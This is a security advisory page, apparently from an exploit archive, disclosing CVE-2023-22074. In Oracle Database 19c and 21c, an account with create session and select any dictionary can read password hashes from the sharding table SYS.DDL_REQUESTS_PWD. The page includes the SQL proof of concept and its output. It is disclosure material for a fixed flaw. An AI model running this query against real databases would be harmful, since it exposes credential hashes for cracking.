Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Oracle 19c / 21c Sharding Component Password Hash Exposure[6]
- Authored by Emad Al-Mousa[7]
-
Oracle database versions 19.3 through 19.20 and 21.3 through 21.11 have an issue where an account with create session and select any dictionary can view password hashes stored in a system table that is part of a sharding component setup.
- advisories | CVE-2023-22074[8]
- SHA-256 |
d2f153475e1ccb9fba7a3c56502ebe8182c7fe13f5f32cca180c60ebe9c205c7
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
Title: CVE-2023-22074 – Oracle database password hash exposure in sharding component
Product: Database
Manufacturer: Oracle
Affected Version(s): 19c,21c [19.3-19.20 and 21.3-21.11]
Tested Version(s): 19c
Risk Level: Low
Solution Status: Fixed
CVE Reference: CVE-2023-22074
Base Score: 2.4
Author of Advisory: Emad Al-Mousa
*****************************************
Vulnerability Details:
Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Attacker compromising an account with create session and select any dictionary can view password hashes stored in a system table that is part of sharding component setup.
*****************************************
Proof of Concept (PoC):
I will create an account called “jim” in pluggable database ORCLPDB1 and grant the account create session and select any dictionary privilege:
SQL> alter session set container=ORCLPDB1;
Session altered.
SQL> create user jim identified by jim123;
User created.
SQL> grant create session,select any dictionary to jim;
Grant succeeded.
I will now connect using database account “jim” and the account will be able to view the password hashes in system table DDL_REQUESTS_PWD used by database sharding component:
sqlplus "jim/jim123"@ORCLPDB1
SQL> show user
USER is "JIM"
SQL> select * from SYS.DDL_REQUESTS_PWD;
DDL_NUM PWD_BEGIN
---------- ----------
ENC_PWD
--------------------------------------------------------------------------------
123 445
E494684108560FFEF1C17CDE72F36A1A
*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2023.html
https://nvd.nist.gov/vuln/detail/CVE-2023-22074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22074
https://databasesecurityninja.wordpress.com/2023/10/25/cve-2023-22074-oracle-database-password-hash-exposure-in-sharding-component/
https://github.com/emad-almousa/CVE-2023-22074
File Tags
- ActiveX[19] (932)
- Advisory[20] (82,780)
- Arbitrary[21] (16,357)
- BBS[22] (2,859)
- Bypass[23] (1,777)
- CGI[24] (1,029)
- Code Execution[25] (7,378)
- Conference[26] (680)
- Cracker[27] (843)
- CSRF[28] (3,352)
- DoS[29] (23,806)
- Encryption[30] (2,372)
- Exploit[31] (52,198)
- File Inclusion[32] (4,231)
- File Upload[33] (977)
- Firewall[34] (821)
- Info Disclosure[35] (2,801)
- Intrusion Detection[36] (897)
- Java[37] (3,085)
- JavaScript[38] (878)
- Kernel[39] (6,797)
- Local[40] (14,545)
- Magazine[41] (586)
- Overflow[42] (12,807)
- Perl[43] (1,423)
- PHP[44] (5,159)
- Proof of Concept[45] (2,348)
- Protocol[46] (3,645)
- Python[47] (1,554)
- Remote[48] (30,971)
- Root[49] (3,599)
- Rootkit[50] (514)
- Ruby[51] (613)
- Scanner[52] (1,645)
- Security Tool[53] (7,917)
- Shell[54] (3,206)
- Shellcode[55] (1,216)
- Sniffer[56] (896)
- Spoof[57] (2,215)
- SQL Injection[58] (16,429)
- TCP[59] (2,417)
- Trojan[60] (687)
- UDP[61] (896)
- Virus[62] (666)
- Vulnerability[63] (31,972)
- Web[64] (9,765)
- Whitepaper[65] (3,753)
- x86[66] (966)
- XSS[67] (18,020)
- Other[68]
File Archives
- October 2023[69]
- September 2023[70]
- August 2023[71]
- July 2023[72]
- June 2023[73]
- May 2023[74]
- April 2023[75]
- March 2023[76]
- February 2023[77]
- January 2023[78]
- December 2022[79]
- November 2022[80]
- Older[81]
Systems
- AIX[82] (428)
- Apple[83] (2,037)
- BSD[84] (375)
- CentOS[85] (57)
- Cisco[86] (1,925)
- Debian[87] (6,877)
- Fedora[88] (1,692)
- FreeBSD[89] (1,246)
- Gentoo[90] (4,354)
- HPUX[91] (879)
- iOS[92] (362)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (69)
- Linux[96] (47,258)
- Mac OS X[97] (691)
- Mandriva[98] (3,105)
- NetBSD[99] (256)
- OpenBSD[100] (486)
- RedHat[101] (14,197)
- Slackware[102] (941)
- Solaris[103] (1,610)
- SUSE[104] (1,444)
- Ubuntu[105] (9,037)
- UNIX[106] (9,328)
- UnixWare[107] (186)
- Windows[108] (6,599)
- Other[109]
- Services
- Security Services[120]
- Hosting By
- Rokasec[121]